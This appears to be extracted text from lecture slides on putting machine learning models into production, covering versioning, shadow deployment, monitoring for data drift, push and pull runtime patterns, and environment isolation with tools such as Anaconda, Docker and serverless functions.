Aim for a reproducible pipeline: the resulting artifact of training code should be directly deployable in production Keep track of each “build” of the model to allow for versioning This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream: e.g. when using Kafka, Apache Pulsar, Spark Streams) After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions. Report errors whilst building and running the model Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, Tensorflow, …), but do allow for flexibility (e.g. using Python libraries) within a well-defined context Isolate the runtime environment per model Allow for an updated model to “run silently” along with the current version so you’re free to test the model for a while and analyze its results (“Canary” or “shadow” deployment) Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end-users and integrators Same for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables available
96
Monitoring, logging and alerting
The issue: models fail silently, their accuracy decrease over time, changing data definitions might still lead to models using those data elements suddenly failing
See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML Test Score? A rubric for ML production systems, set up a common monitoring and logging platform Keep track of inputs provided to the model
Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve?
Keep track of model outputs as well over time
Does the probability distribution of the model change over time? Does usage decrease? Do predictions fail? How long does it take to call the model? Repeated backtesting of repeat control experiments are even better, but harder
97
Runtime patterns
The issue: where do models run? How will they be exposed in the
- rganization?
Two common patterns:
Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being save to the data layer, e.g. to Hadoop, an FTP server, a relational database table, an Excel file Pull: the model is deployed as an API or microservice to be queried by outside consumers … to be used by web apps, mobile apps, BI dashboards, reports…
In both cases, an isolated runtime environment need to be provided!
98
Runtime patterns
Isolated runtime environments
Each deployed version of a model comes with its own environment
E.g. Python version, packages used and their version, other supporting executables and libraries
Different levels of isolation are possible
Environment isolation: e.g. using Python virtual environments, Anaconda environments (e.g. each model runs in its own Anaconda environment) Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (e.g. each model runs in its own Docker container above a shared OS layer) Virtualization: full OS stack is isolated on top of a hardware emulation layer Serverless: models are deployed using e.g. Amazon Lambda, Azure Functions, Google Cloud Functions Typically combined with data layers in the cloud as well
Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting
99
Closing
Trade-off between flexibility and robustness: allowing for experimentation for ad-hoc, new or experimental projects is still fine
Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks
Not all models end as an API
In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?